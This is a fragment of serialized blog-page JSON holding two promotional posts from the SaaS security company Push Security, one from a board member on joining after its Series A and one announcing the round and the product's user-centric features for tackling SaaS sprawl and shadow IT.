",{"data":322680,"content":322682,"nodeType":186},{"uri":322681},"https://www.youtube.com/watch?v=QETfA9_b7wM",[322683],{"data":322684,"marks":322685,"value":322687,"nodeType":173},{},[322686],{"type":194},"Audrey II hungry",{"data":322689,"marks":322690,"value":322691,"nodeType":173},{},[],"), as we’ve seen countless new SaaS apps spring up across the software ecosystem. This is great news for organizations of all shapes and sizes. Embracing modern SaaS enables employees to be more productive, use the apps they love, and, as many companies have been recently pressured, ",{"data":322693,"content":322695,"nodeType":186},{"uri":322694},"https://www.washingtonpost.com/business/interactive/2023/tech-layoffs-company-memos/",[322696],{"data":322697,"marks":322698,"value":322700,"nodeType":173},{},[322699],{"type":194},"do more with less",{"data":322702,"marks":322703,"value":322704,"nodeType":173},{},[],". But it’s less of a fun time for security teams that are trying to grapple with this sprawl of shadow IT…and have always had to do more with less!",{"data":322706,"content":322707,"nodeType":178},{},[322708,322712,322720,322724,322733,322737,322748],{"data":322709,"marks":322710,"value":322711,"nodeType":173},{},[],"The sprawl of SaaS apps is not just a raw increase of apps in-use in a modern enterprise (which is often wildly underestimated by CIOs/CISOs), but also the result of bottoms-up adoption of new apps. Driven by the ",{"data":322713,"content":322715,"nodeType":186},{"uri":322714},"https://openviewpartners.com/product-led-growth/",[322716],{"data":322717,"marks":322718,"value":225762,"nodeType":173},{},[322719],{"type":194},{"data":322721,"marks":322722,"value":322723,"nodeType":173},{},[]," (PLG) movement, employees now frequently sign-up in a self-service manner for new SaaS apps and put them immediately into use on an individual or team level, without the traditional review, procurement, and management by corporate IT/security teams. Move fast, and cross your fingers that you don’t ",{"data":322725,"content":322727,"nodeType":186},{"uri":322726},"https://hbr.org/2019/01/the-era-of-move-fast-and-break-things-is-over",[322728],{"data":322729,"marks":322730,"value":322732,"nodeType":173},{},[322731],{"type":194},"break too many things",{"data":322734,"marks":322735,"value":322736,"nodeType":173},{},[],"? Push has ",{"data":322738,"content":322742,"nodeType":1698},{"target":322739},{"sys":322740},{"id":322741,"type":317,"linkType":318},"1t9lzEIIB2PNrN1pyG3RRy",[322743],{"data":322744,"marks":322745,"value":322747,"nodeType":173},{},[322746],{"type":194},"written about this shift",{"data":322749,"marks":322750,"value":322751,"nodeType":173},{},[]," in more detail, which is worth reading. ",{"data":322753,"content":322754,"nodeType":178},{},[322755,322759,322767,322771,322780,322784,322792,322796,322805],{"data":322756,"marks":322757,"value":322758,"nodeType":173},{},[],"These unsanctioned/unmanaged SaaS apps represent a growing attack surface. While the problems of shadow IT are not necessarily new, I would argue that the true security risk, which perhaps was not fully-appreciated previously, has recently come to the forefront through high-profile ",{"data":322760,"content":322761,"nodeType":186},{"uri":209010},[322762],{"data":322763,"marks":322764,"value":322766,"nodeType":173},{},[322765],{"type":194},"supply chain compromises",{"data":322768,"marks":322769,"value":322770,"nodeType":173},{},[],". Whether it’s a single user getting ",{"data":322772,"content":322774,"nodeType":186},{"uri":322773},"https://pushsecurity.com/blog/consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa",[322775],{"data":322776,"marks":322777,"value":322779,"nodeType":173},{},[322778],{"type":194},"OAuth phished",{"data":322781,"marks":322782,"value":322783,"nodeType":173},{},[],", password reuse across SaaS apps targeted by ",{"data":322785,"content":322787,"nodeType":186},{"uri":322786},"https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/",[322788],{"data":322789,"marks":322790,"value":182807,"nodeType":173},{},[322791],{"type":194},{"data":322793,"marks":322794,"value":322795,"nodeType":173},{},[],", or a breach of a ",{"data":322797,"content":322799,"nodeType":186},{"uri":322798},"https://www.proofpoint.com/us/blog/cloud-security/dangerous-consequences-threat-actors-abusing-microsofts-verified-publisher",[322800],{"data":322801,"marks":322802,"value":322804,"nodeType":173},{},[322803],{"type":194},"third-party integration",{"data":322806,"marks":322807,"value":322808,"nodeType":173},{},[]," plugged into your Google Workspace or Microsoft 365, the risks are now clear and present.",{"data":322810,"content":322811,"nodeType":235},{},[322812],{"data":322813,"marks":322814,"value":322815,"nodeType":173},{},[],"Work with employees, not around them",{"data":322817,"content":322818,"nodeType":178},{},[322819,322823,322832],{"data":322820,"marks":322821,"value":322822,"nodeType":173},{},[],"Despite SaaS sprawl and the proliferation of related attacks, I’ve always had a belief that users are good-intentioned, want to be productive in their job, and desire to keep their organization secure. We can’t ask users to walk a terrifying tightrope of security (“don’t get phished”, “don’t open attachments”, “don’t click links”, “don’t plug things into your computer”, etc) and still do their actual job effectively. In the modern day, you either design a ",{"data":322824,"content":322826,"nodeType":186},{"uri":322825},"https://www.oreilly.com/library/view/oscon-2017/9781491976227/video306724.html",[322827],{"data":322828,"marks":322829,"value":322831,"nodeType":173},{},[322830],{"type":194},"paved path",{"data":322833,"marks":322834,"value":322835,"nodeType":173},{},[]," for your users to be able to move quickly and safely, or you risk the consequences when they go off-roading.",{"data":322837,"content":322838,"nodeType":178},{},[322839],{"data":322840,"marks":322841,"value":322842,"nodeType":173},{},[],"When there is no paved path for those good-intentioned users to get their job done, it’s no surprise that they find creative ways to work around poorly-designed security controls. For example, if an employee has to jump through a lot of hoops to get on the corporate VPN and access an internal Sharepoint instance in order to collaborate with colleagues, they’re likely to just sign-up for and use a self-service Box/Dropbox/Trello tenant. A violation of corporate security policy? Perhaps. A shadow IT risk to the organization? Sure. But they’re not being malicious, they’re just trying to get their job done.",{"data":322844,"content":322845,"nodeType":178},{},[322846,322850,322859],{"data":322847,"marks":322848,"value":322849,"nodeType":173},{},[],"Enter, Push Security. Push is tackling these challenges of shadow IT, helping to simplify SaaS security while meeting users where they are and enlisting them in the solution. Push allows security teams to get complete, real-time visibility into the SaaS apps in use in their enterprise, automates the fixing of any risky issues by involving the end user, and provides real-time guidance to head off new issues before they even happen. See ",{"data":322851,"content":322854,"nodeType":1698},{"target":322852},{"sys":322853},{"id":322741,"type":317,"linkType":318},[322855],{"data":322856,"marks":322857,"value":322858,"nodeType":173},{},[],"Adam’s blog post ",{"data":322860,"marks":322861,"value":322862,"nodeType":173},{},[],"for a double-click on all the capabilities of the Push platform.",{"data":322864,"content":322865,"nodeType":178},{},[322866],{"data":322867,"marks":322868,"value":322869,"nodeType":173},{},[],"Push’s vision particularly resonated with me, as it is a natural extension of the user-centric security that we built at Duo. Push allows security teams to go beyond just front door entrance of application access (eg. authentication) and look deeper into latent risks presented by SaaS applications themselves, the data contained within, and their risky app-to-app interconnectedness. And, often, the best first step after identifying the litany of unsanctioned apps in use in your organization is to quickly get the critical ones safely under your umbrella of SSO/MFA (via Duo, Okta, Azure AD, etc), which I know was a common challenge for our many customers at Duo.",{"data":322871,"content":322872,"nodeType":235},{},[322873],{"data":322874,"marks":322875,"value":322876,"nodeType":173},{},[],"CASB and SSPM aren’t enough",{"data":322878,"content":322879,"nodeType":178},{},[322880],{"data":322881,"marks":322882,"value":322883,"nodeType":173},{},[],"Past attempts to tackle these problems, notably CASB vendors, have had limited success. It’s clear the network/proxy-based CASB approach is not a survivable architecture for the modern world of cloud and mobility. Even an API-only integration, the approach taken by some SSPM vendors, is necessary but not sufficient for the scope of the problem space. ",{"data":322885,"content":322886,"nodeType":178},{},[322887],{"data":322888,"marks":322889,"value":322890,"nodeType":173},{},[],"For example, it’s not enough to just know that Box is an app in-use by your users. Many organizations that have their corporate Box tenant “managed” with SSO/MFA/etc, but may be unaware of the 10+ shadow non-managed Box tenants that their users have created and are actively sharing documents through. Do you think you have just one Box, Slack, Monday, etc? Push, with its unique architecture of plugging into your SaaS apps as well as interfacing with the user via a browser extension, can achieve this accurate, fine-grained visibility into SaaS usage.",{"data":322892,"content":322893,"nodeType":235},{},[322894],{"data":322895,"marks":322896,"value":322897,"nodeType":173},{},[],"Automate fixes by involving the end user, your employees",{"data":322899,"content":322900,"nodeType":178},{},[322901,322905,322914,322918,322927],{"data":322902,"marks":322903,"value":322904,"nodeType":173},{},[],"Push is also unique in enlisting the end user, not just in identifying the problems of SaaS sprawl, but in remediating discovered issues. This user-centric approach naturally resonated with my experience at Duo. After all, ",{"data":322906,"content":322908,"nodeType":186},{"uri":322907},"https://www.youtube.com/watch?v=JN0Hj0pKZ7U",[322909],{"data":322910,"marks":322911,"value":322913,"nodeType":173},{},[322912],{"type":194},"Duo Push",{"data":322915,"marks":322916,"value":322917,"nodeType":173},{},[]," and our ",{"data":322919,"content":322921,"nodeType":186},{"uri":322920},"https://duo.com/blog/mobile-device-security-made-easy-with-duos-security-checkup",[322922],{"data":322923,"marks":322924,"value":322926,"nodeType":173},{},[322925],{"type":194},"Security Checkup",{"data":322928,"marks":322929,"value":322930,"nodeType":173},{},[]," were just low-fidelity mechanisms to ask your users to engage positively in your security program. ",{"data":322932,"content":322933,"nodeType":178},{},[322934,322938,322946,322950,322955],{"data":322935,"marks":322936,"value":322937,"nodeType":173},{},[],"Push takes this philosophy much further with their ",{"data":322939,"content":322941,"nodeType":186},{"uri":322940},"https://pushsecurity.com/kb/10004/",[322942],{"data":322943,"marks":322944,"value":319546,"nodeType":173},{},[322945],{"type":194},{"data":322947,"marks":322948,"value":322949,"nodeType":173},{},[],", creating a direct, interactive interface to users. Sometimes users just need a gentle ",{"data":322951,"marks":322952,"value":322954,"nodeType":173},{},[322953],{"type":1646},"push",{"data":322956,"marks":322957,"value":322958,"nodeType":173},{},[]," in the right direction, to make good security decisions or improve the organization’s security hygiene. Push can help users adopt existing security controls (eg. MFA), identify risky configurations (eg. malicious mail forwarding), and reduce attack surface (eg. unused or risky OAuth integrations). Interfacing directly with users can increase fidelity (who knows better ground truth than the user themselves), increase remediation speed, and allow your security program to scale without hiring a bunch of analysts to run down endless lists of alerts. Of course, you're not just handing over the keys to the user, but selectively using their superpowers to augment your centralized visibility and control.",{"data":322960,"content":322961,"nodeType":178},{},[322962],{"data":322963,"marks":322964,"value":322965,"nodeType":173},{},[],"In essence, Push has created that paved path to allow your users to move quickly, but also with the appropriate guardrails for when they go off-roading. Maybe those guardrails are a 10-foot reinforced concrete wall for your security-sensitive organization. Maybe they’re a light safety barrier to help try to keep users on track. And maybe your org really embraces speed and employee autotomy, so you just want an “invisible fence” to be alerted when users go off the track. Regardless of your security culture, Push gives you the necessary visibility of your shadow IT to make informed risk decisions appropriate for your business and enact the right controls.",{"data":322967,"content":322968,"nodeType":235},{},[322969],{"data":322970,"marks":322971,"value":322972,"nodeType":173},{},[],"Securing SaaS for everyone, not just large enterprises",{"data":322974,"content":322975,"nodeType":178},{},[322976],{"data":322977,"marks":322978,"value":322979,"nodeType":173},{},[],"Lastly, the explosion of SaaS is not a uniquely enterprise phenomena, but felt by companies of all shapes and sizes. As I experienced at Duo, designing security products for ease-of-use can be a game-changer for small/medium-sized organizations that lack the staff, time, and budget to manage complex security tools. But, whether you’re a SMB or a F500 enterprise, everyone is strapped for resources and wants to maximize the security impact of their limited team, not create more busy-work and alerts to run down. Push has built a platform that is easy to try, deploy, and manage, whether you’re a small business with a one-person security team or a large enterprise looking to scale your SaaS security across tens of thousands of employees.",{"data":322981,"content":322982,"nodeType":178},{},[322983,322987,322996],{"data":322984,"marks":322985,"value":322986,"nodeType":173},{},[],"I felt conviction about Push early on when I first met co-founders Adam, Tyrone, and Jacques in 2021. Not just excitement around the problem space and product philosophy, but a personal resonance with the team. Deep technical founders and security practitioners, fed up with the ",{"data":322988,"content":322990,"nodeType":186},{"uri":322989},"https://www.markerbench.com/blog/2005/05/04/Escaping-the-Hamster-Wheel-of-Pain/",[322991],{"data":322992,"marks":322993,"value":322995,"nodeType":173},{},[322994],{"type":194},"hamster-wheel-of-pain",{"data":322997,"marks":322998,"value":322999,"nodeType":173},{},[]," of detection and response, and eager to battle the status quo of the security industry with a fresh and positive approach. It sure felt familiar! That conviction grew as I observed their early development and progress, when I joined in the seed round led by Decibel last year, and when I saw the customer adoption after their product launch less than a year ago. So, with their recent Series A round, led by Karim Faris at GV, I’m honored to join the board of Push and continue supporting a great team and product.",{"data":323001,"content":323002,"nodeType":178},{},[323003,323007,323016],{"data":323004,"marks":323005,"value":323006,"nodeType":173},{},[],"\nBut, hey, don’t just take my word for it, ",{"data":323008,"content":323010,"nodeType":186},{"uri":323009},"https://pushsecurity.com/signup",[323011],{"data":323012,"marks":323013,"value":323015,"nodeType":173},{},[323014],{"type":194},"sign up for free today",{"data":323017,"marks":323018,"value":323019,"nodeType":173},{},[]," and bring some sanity to your SaaS security.",{"entries":323021},{"block":323022,"inline":323023,"hyperlink":323024},[],[],[323025],{"sys":323026,"__typename":1528,"title":323027,"slug":323028},{"id":322741},"From launch to series A ","from-launch-to-series-a",{"items":323030},[323031],{"__typename":1528,"sys":323032,"content":323033,"title":323027,"synopsis":323562,"hashTags":118,"publishedDate":323563,"slug":323028,"tagsCollection":323564,"authorsCollection":323570},{"id":322741},{"json":323034},{"data":323035,"content":323036,"nodeType":165},{},[323037,323070,323077,323084,323103,323110,323115,323120,323152,323159,323166,323182,323189,323196,323239,323245,323252,323259,323266,323281,323288,323295,323302,323308,323315,323322,323329,323336,323343,323349,323356,323398,323405,323412,323418,323425,323432,323439,323445,323452,323459,323466,323472,323479,323486,323493,323500,323516,323532],{"data":323038,"content":323039,"nodeType":178},{},[323040,323044,323052,323056,323066],{"data":323041,"marks":323042,"value":323043,"nodeType":173},{},[],"We’re proud to share that we’ve locked in our ",{"data":323045,"content":323047,"nodeType":186},{"uri":323046},"https://techcrunch.com/2023/04/03/push-security-raises-15m-to-help-saas-users-lower-their-online-vulnerability/",[323048],{"data":323049,"marks":323050,"value":323051,"nodeType":173},{},[],"Series A round",{"data":323053,"marks":323054,"value":323055,"nodeType":173},{},[],", led by GV (Google Ventures). We’ve learned a lot about what our customers need since we ",{"data":323057,"content":323061,"nodeType":1698},{"target":323058},{"sys":323059},{"id":323060,"type":317,"linkType":318},"1LWXA4OL7v5bqsS4acnnpr",[323062],{"data":323063,"marks":323064,"value":323065,"nodeType":173},{},[],"launched in July 2022",{"data":323067,"marks":323068,"value":323069,"nodeType":173},{},[]," - they want to help employees use SaaS more securely, of course, but they also need centralized visibility and the ability to make good decisions around the use of SaaS by knowing how their employees are using it. ",{"data":323071,"content":323072,"nodeType":178},{},[323073],{"data":323074,"marks":323075,"value":323076,"nodeType":173},{},[],"Most security-savvy organizations have a fairly good handle on IT-owned and managed SaaS platforms (like Microsoft 365, Google Workspace, Salesforce, Slack, etc) and many have started using newer security solutions that discover the SaaS work apps that employees have started using and often integrated with those IT-owned platforms. ",{"data":323078,"content":323079,"nodeType":235},{},[323080],{"data":323081,"marks":323082,"value":323083,"nodeType":173},{},[],"The rise of PLG and how it impacts security ",{"data":323085,"content":323086,"nodeType":178},{},[323087,323091,323099],{"data":323088,"marks":323089,"value":323090,"nodeType":173},{},[],"What they’ve been missing is the ",{"data":323092,"content":323093,"nodeType":186},{"uri":322714},[323094],{"data":323095,"marks":323096,"value":323098,"nodeType":173},{},[323097],{"type":194},"rise of product-led growth",{"data":323100,"marks":323101,"value":323102,"nodeType":173},{},[]," (PLG) - a popular sales motion that relies on the product itself as the primary driver for customer acquisition and conversion. Potential buyers sign up, integrate it, and experience the product value before going through any sales-cycle. ",{"data":323104,"content":323105,"nodeType":178},{},[323106],{"data":323107,"marks":323108,"value":323109,"nodeType":173},{},[],"The impact this has on security is that where in the past, employees would have needed to go centrally through procurement, which gives the security team an opportunity to assess the risk and determine whether or not the service would invalidate the organization’s security compliance. With PLG, employees can (and do) onboard sensitive applications themselves directly. This shift in buying behavior has contributed to a sharp increase of SaaS sprawl and shadow IT.",{"data":323111,"content":323114,"nodeType":312},{"target":323112},{"sys":323113},{"id":280474,"type":317,"linkType":318},[],{"data":323116,"content":323119,"nodeType":312},{"target":323117},{"sys":323118},{"id":280624,"type":317,"linkType":318},[],{"data":323121,"content":323122,"nodeType":178},{},[323123,323127,323131,323135,323140,323144,323148],{"data":323124,"marks":323125,"value":323126,"nodeType":173},{},[],"PLG is also the norm for app-to-app integrations as well. In our data, we found that",{"data":323128,"marks":323129,"value":3107,"nodeType":173},{},[323130],{"type":370},{"data":323132,"marks":323133,"value":323134,"nodeType":173},{},[],"around 37% of Microsoft 365 app integrations were IT-approved and owned. ",{"data":323136,"marks":323137,"value":323139,"nodeType":173},{},[323138],{"type":370},"The rest (63%) were all employee-owned and consented to. ",{"data":323141,"marks":323142,"value":323143,"nodeType":173},{},[],"That’s just looking at app-to-app integrations to the M365 tenant, so it doesn’t include all the SaaS apps accessed through the browser.",{"data":323145,"marks":323146,"value":3107,"nodeType":173},{},[323147],{"type":370},{"data":323149,"marks":323150,"value":323151,"nodeType":173},{},[],"Sure, some of those apps are used by a whole team and may be on IT’s radar if the department head went through the proper security measures. But many may just be used by one person or a team is just signing up for a free trial. And even for those free/trial instances, the apps need to integrate with business apps and data to work and test, so they can present as much risk as any other app used in your environment.",{"data":323153,"content":323154,"nodeType":235},{},[323155],{"data":323156,"marks":323157,"value":323158,"nodeType":173},{},[],"What’s the risk of SaaS sprawl?",{"data":323160,"content":323161,"nodeType":178},{},[323162],{"data":323163,"marks":323164,"value":323165,"nodeType":173},{},[],"The unknowns - the old trope that you can’t protect what you don’t know is cliche for a reason - it’s true. Not every SaaS app or integration carries massive risk, but most apps employees are using to get important work done accesses sensitive data or need to integrate with business data, which is then shared with a third party in each instance.",{"data":323167,"content":323168,"nodeType":178},{},[323169,323173,323178],{"data":323170,"marks":323171,"value":323172,"nodeType":173},{},[],"Each app becomes an asset that security teams need to protect and each new account employees create forms part of the company’s public-facing attack surface. With PLG, apps are adopted ",{"data":323174,"marks":323175,"value":323177,"nodeType":173},{},[323176],{"type":1646},"before ",{"data":323179,"marks":323180,"value":323181,"nodeType":173},{},[],"security get a chance to onboard them onto SSO, so weak user accounts employees have created are a potential entry point for an attacker.",{"data":323183,"content":323184,"nodeType":178},{},[323185],{"data":323186,"marks":323187,"value":323188,"nodeType":173},{},[],"This can be a high ROI technique for an attacker. Instead of burning client-side exploits and C2 infrastructure, an attacker kicks off an automated password scan against all popular SaaS apps and gets alerted each time they access an account. Attackers are also utilizing credential stuffing by taking a single compromised employee password and trying it against every popular SaaS service to extend their access. ",{"data":323190,"content":323191,"nodeType":178},{},[323192],{"data":323193,"marks":323194,"value":323195,"nodeType":173},{},[],"The sensitivity of these applications vary depending on their capability, but some particularly high-risk examples we’ve come across include:",{"data":323197,"content":323198,"nodeType":246189},{},[323199,323209,323219,323229],{"data":323200,"content":323201,"nodeType":254},{},[323202],{"data":323203,"content":323204,"nodeType":178},{},[323205],{"data":323206,"marks":323207,"value":323208,"nodeType":173},{},[],"Apps that access employee email - attackers can use this access to do account resets and compromise other SaaS apps.",{"data":323210,"content":323211,"nodeType":254},{},[323212],{"data":323213,"content":323214,"nodeType":178},{},[323215],{"data":323216,"marks":323217,"value":323218,"nodeType":173},{},[],"Compromising development or testing tools that have access to API keys and production systems.",{"data":323220,"content":323221,"nodeType":254},{},[323222],{"data":323223,"content":323224,"nodeType":178},{},[323225],{"data":323226,"marks":323227,"value":323228,"nodeType":173},{},[],"Compromising data warehouses, or any independent SaaS app that integrates back with that data warehouse.",{"data":323230,"content":323231,"nodeType":254},{},[323232],{"data":323233,"content":323234,"nodeType":178},{},[323235],{"data":323236,"marks":323237,"value":323238,"nodeType":173},{},[],"Compromising marketing apps that can be used to control public facing assets such as the company social media account or website. ",{"data":323240,"content":323241,"nodeType":178},{},[323242],{"data":323243,"marks":323244,"value":37,"nodeType":173},{},[],{"data":323246,"content":323247,"nodeType":169},{},[323248],{"data":323249,"marks":323250,"value":323251,"nodeType":173},{},[],"The Solution ",{"data":323253,"content":323254,"nodeType":235},{},[323255],{"data":323256,"marks":323257,"value":323258,"nodeType":173},{},[],"Complete, real time, centralized visibility",{"data":323260,"content":323261,"nodeType":178},{},[323262],{"data":323263,"marks":323264,"value":323265,"nodeType":173},{},[],"To get a handle on the SaaS sprawl and shadow IT that the PLG movement has caused, security teams need complete visibility of every business application (SaaS apps, cloud apps, app-to-app integrations, etc.) employees are adopting, integrating with company data, and accessing through the browser.",{"data":323267,"content":323268,"nodeType":178},{},[323269,323273,323277],{"data":323270,"marks":323271,"value":323272,"nodeType":173},{},[],"Alongside visibility, security teams also need the option to turn on notifications to keep them up to date about potential security concerns around SaaS use in their organization. This provides security teams with near real-time visibility so they’re notified when someone has signed up for a new app. If an employee or team has been using an app for weeks or months, it can be much more difficult to migrate them to a more secure platform if security decides the risks outweigh the benefits for that app. It also means that security teams get to be part of the decision-making process again. So, even though the PLG model has put security in the mode of constantly having to play catch-up to do risk assessments ",{"data":323274,"marks":323275,"value":16081,"nodeType":173},{},[323276],{"type":1646},{"data":323278,"marks":323279,"value":323280,"nodeType":173},{},[]," the app has been adopted, security teams can reclaim their role in the procurement process with timely notifications. ",{"data":323282,"content":323283,"nodeType":178},{},[323284],{"data":323285,"marks":323286,"value":323287,"nodeType":173},{},[],"The thing is, the notifications need to have enough information to be meaningful rather than just acting as another alert to distract them from their work. Enter channel messaging for security teams. ",{"data":323289,"content":323290,"nodeType":178},{},[323291],{"data":323292,"marks":323293,"value":323294,"nodeType":173},{},[],"Our new channel messaging feature tells security teams about new SaaS being onboarded, of course, but also provides useful security insights about that activity. If a new app is added to or integrated with the company’s Google Workspace or Microsoft 365 tenant, we can tell you in Slack or Teams, and we’ll also let you know if it’s low-risk or if it merits more investigation. ",{"data":323296,"content":323297,"nodeType":178},{},[323298],{"data":323299,"marks":323300,"value":323301,"nodeType":173},{},[],"In the case of app-to-app integrations, we’ve decided against providing an abstract risk score, which isn’t actually very helpful, and focused instead on tangible information on what data the integration exposes, so the security team can make the right risk assessment for their organization. See the example below:",{"data":323303,"content":323307,"nodeType":312},{"target":323304},{"sys":323305},{"id":323306,"type":317,"linkType":318},"4e6ERBq2KkDpM8VxwIW3zV",[],{"data":323309,"content":323310,"nodeType":178},{},[323311],{"data":323312,"marks":323313,"value":323314,"nodeType":173},{},[],"We’ll also flag you if an integration is high-risk because it’s asking for excessive data permissions. For instance, one interesting data point we’ve discovered since launch: 23% of the Microsoft app-to-app integrations we discovered granted access to high-risk assets or data, such as email inboxes, and shared drives like OneDrive. For Google workspace, 17% were equally high-risk.",{"data":323316,"content":323317,"nodeType":178},{},[323318],{"data":323319,"marks":323320,"value":323321,"nodeType":173},{},[],"Security teams need complete SaaS visibility and foundational insights into the security impact of those apps used in their business. Couple that visibility with a user-centric approach to security and you’ve got baseline SaaS security covered, whether you’re a small business with no dedicated team or you’re an enterprise with a highly skilled, dedicated team that’s overburdened with constant alerts and struggling to make actual improvements to your company’s security posture.",{"data":323323,"content":323324,"nodeType":235},{},[323325],{"data":323326,"marks":323327,"value":323328,"nodeType":173},{},[],"Automate the fix by involving the user",{"data":323330,"content":323331,"nodeType":178},{},[323332],{"data":323333,"marks":323334,"value":323335,"nodeType":173},{},[],"The most sensible way we’ve found to scale SaaS security in an employee-adopted apps world is to put users at the center of helping to improve security. We prompt users at the right time to encourage them to take an action that will benefit an organization’s security, like updating their software or securing their user account with MFA or a stronger password.",{"data":323337,"content":323338,"nodeType":178},{},[323339],{"data":323340,"marks":323341,"value":323342,"nodeType":173},{},[],"This shared responsibility model is nothing new, really. It’s a concept that was pioneered by Slack, Netflix, and Duo Security before us. The way we’re applying it to securing employee SaaS use, however, is pretty novel. To us, a user-centric approach doesn’t simply mean building in ChatOps in Slack and Teams - it’s building in a variety of ways to notify and interact with the user when the time is right for them to take action. ",{"data":323344,"content":323348,"nodeType":312},{"target":323345},{"sys":323346},{"id":323347,"type":317,"linkType":318},"5wZDwVTGbh5f4qliO2ft3E",[],{"data":323350,"content":323351,"nodeType":178},{},[323352],{"data":323353,"marks":323354,"value":323355,"nodeType":173},{},[],"Our approach involves the user from beginning to end:",{"data":323357,"content":323358,"nodeType":250},{},[323359,323378,323388],{"data":323360,"content":323361,"nodeType":254},{},[323362],{"data":323363,"content":323364,"nodeType":178},{},[323365,323369,323374],{"data":323366,"marks":323367,"value":323368,"nodeType":173},{},[],"We provide real-time guidance to help prevent problems ",{"data":323370,"marks":323371,"value":323373,"nodeType":173},{},[323372],{"type":1646},"before they happen",{"data":323375,"marks":323376,"value":323377,"nodeType":173},{},[]," (in the browser),",{"data":323379,"content":323380,"nodeType":254},{},[323381],{"data":323382,"content":323383,"nodeType":178},{},[323384],{"data":323385,"marks":323386,"value":323387,"nodeType":173},{},[],"We nudge employees to self-remediate issues that have already happened, and",{"data":323389,"content":323390,"nodeType":254},{},[323391],{"data":323392,"content":323393,"nodeType":178},{},[323394],{"data":323395,"marks":323396,"value":323397,"nodeType":173},{},[],"We provide an overview for each employee, so the security team can see each employee’s security state for their SaaS use.",{"data":323399,"content":323400,"nodeType":235},{},[323401],{"data":323402,"marks":323403,"value":323404,"nodeType":173},{},[],"Real-time guidance",{"data":323406,"content":323407,"nodeType":178},{},[323408],{"data":323409,"marks":323410,"value":323411,"nodeType":173},{},[],"Our just-in-time notifications act like password-checkers in the browser, but they’re more robust in that security teams can fully customize which words and phrases employees can’t use in their passwords as they’re creating new accounts; it might be company name, location, common words, street address, and so on). This helps prevent employees from creating weak passwords like those that were leaked in a password dump after a breach. Here’s how we’re doing that in the browser:",{"data":323413,"content":323417,"nodeType":312},{"target":323414},{"sys":323415},{"id":323416,"type":317,"linkType":318},"59eQuuZH8RICARjwXAJrWw",[],{"data":323419,"content":323420,"nodeType":178},{},[323421],{"data":323422,"marks":323423,"value":323424,"nodeType":173},{},[],"These simple measures help employees pick stronger passwords from the start, cutting down on the need for any nudges on ChatOps or any notifications to security. Why fix issues when you can prevent them from ever happening?",{"data":323426,"content":323427,"nodeType":235},{},[323428],{"data":323429,"marks":323430,"value":323431,"nodeType":173},{},[],"Notifications",{"data":323433,"content":323434,"nodeType":178},{},[323435],{"data":323436,"marks":323437,"value":323438,"nodeType":173},{},[],"We use notifications in ChatOps (Slack or Teams) when employees can fix security issues with one click without the need for security to talk to them directly. An example of this is using a chat to check if an employee is still using a dormant or inactive app. If they’re not using it, they can automatically eliminate it from the company’s attack surface by clicking the “I’m not using it, you can remove” button. ",{"data":323440,"content":323444,"nodeType":312},{"target":323441},{"sys":323442},{"id":323443,"type":317,"linkType":318},"6deX1SbkDVkXGT7FthM9pd",[],{"data":323446,"content":323447,"nodeType":235},{},[323448],{"data":323449,"marks":323450,"value":323451,"nodeType":173},{},[],"Employee SaaS security overview",{"data":323453,"content":323454,"nodeType":178},{},[323455],{"data":323456,"marks":323457,"value":323458,"nodeType":173},{},[],"The final component of user-centric security is to provide a personal view of an employee’s overall security state. Security teams can see each employee’s SaaS security state for a quick view of where they need to fix security issues and where they’re in the clear. This user security dashboard is really handy for visibility over particularly high-risk employees (usually those who use a lot of different SaaS apps and those who work with highly sensitive data - like legal teams, executives, HR, finance, etc.). ",{"data":323460,"content":323461,"nodeType":178},{},[323462],{"data":323463,"marks":323464,"value":323465,"nodeType":173},{},[],"By displaying this information in a single, clean, easy to read panel, both employees and security teams can work together to take actions to fix issues quickly and easily.",{"data":323467,"content":323471,"nodeType":312},{"target":323468},{"sys":323469},{"id":323470,"type":317,"linkType":318},"7IZDuJ7c2takbu4OaKLsKB",[],{"data":323473,"content":323474,"nodeType":169},{},[323475],{"data":323476,"marks":323477,"value":323478,"nodeType":173},{},[],"How to apply a user-centric approach in your organization",{"data":323480,"content":323481,"nodeType":178},{},[323482],{"data":323483,"marks":323484,"value":323485,"nodeType":173},{},[],"\nWe’ve found that many companies believe in a user-centric approach to security in theory, but what that looks like in practice is less clear. That’s partly because there’s confusion around how to apply a concept that feels like a design principle to your organization’s security strategy. Most people we talk to like the idea of equipping employees to help secure the apps they’re using, but how to make that work in their environment is a bit scary, since it directly impacts every person in the company. ",{"data":323487,"content":323488,"nodeType":178},{},[323489],{"data":323490,"marks":323491,"value":323492,"nodeType":173},{},[],"Part of the problem is that “user-centric” has become a bit of a buzzword in marketing, with a lot of the vendors saying they’re user-centric when that really means they’ve just built a Slack or Teams integration that can message employees. Turning that feature on without thinking about how it’ll impact all of the employees in the business is a recipe for disaster. ",{"data":323494,"content":323495,"nodeType":178},{},[323496],{"data":323497,"marks":323498,"value":323499,"nodeType":173},{},[],"After speaking with customers and prospects since launch, we’ve discovered how important it is that we clearly explain how employees are going to be contacted and with what information. To adopt a user-centric approach that actually leads to measurable improvements in security, you need a tool that reaches out to employees with the right messaging at the right time and in the right place, whether that’s via ChatOps or in the browser, where they’re working.",{"data":323501,"content":323502,"nodeType":169},{},[323503,323507,323512],{"data":323504,"marks":323505,"value":323506,"nodeType":173},{},[],"Equipping employees is ",{"data":323508,"marks":323509,"value":323511,"nodeType":173},{},[323510],{"type":1646},"part",{"data":323513,"marks":323514,"value":323515,"nodeType":173},{},[]," of the solution, not the whole solution ",{"data":323517,"content":323518,"nodeType":178},{},[323519,323523,323528],{"data":323520,"marks":323521,"value":323522,"nodeType":173},{},[],"User-centric approaches are a tool in the security team’s toolbox, a practical way to bring employees into the process - not a way to outsource the technical security burden to people with no security expertise. You don’t get to outsource security to employees and employees should ",{"data":323524,"marks":323525,"value":323527,"nodeType":173},{},[323526],{"type":1646},"never ",{"data":323529,"marks":323530,"value":323531,"nodeType":173},{},[],"be making technical security decisions on the company’s behalf. Employees provide context on how they’re using apps so that the security team can make risk-based decisions on which apps employees can use. ",{"data":323533,"content":323534,"nodeType":178},{},[323535,323539,323547,323550,323558],{"data":323536,"marks":323537,"value":323538,"nodeType":173},{},[],"By adopting a user-centric approach alongside centralized visibility and controls, most security teams have found a way to secure employee SaaS accounts and SaaS use at scale. We’re excited to work with our customers and investors to solve new problems in this emerging space. Follow us on 